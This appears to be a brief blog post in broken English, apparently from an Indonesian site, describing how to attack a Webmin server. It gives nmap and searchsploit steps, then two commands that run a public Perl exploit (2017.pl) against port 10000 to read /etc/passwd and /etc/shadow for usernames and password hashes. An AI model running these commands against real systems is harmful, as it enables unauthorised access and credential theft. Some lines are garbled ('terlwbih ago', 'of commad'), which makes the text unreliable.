"example: I do a scan using nmap and Zenmap"
scans were performed using <ip Target>

and do exploits perform the command:. /searchsploit ssh linux remote.
3. of commad /searchsploit ssh linux remote
I will do exploits. / searchsploit webmin prior to proceeding to the next stage
in this case I use port 10000/tcp (webmin httpd), and after that I type
example : "perl platforms/multiple/remote/2017.pl 192.168.43.130 10000 /etc/passwd 0"
to know the user list or login code.
and now type "perl platforms/multiple/remote/2017.pl 192.168.43.130 10000 /etc/shadow 0"to know the login password.
determines the contents of the files we need to extract the files terlwbih ago





Tidak ada komentar:
Posting Komentar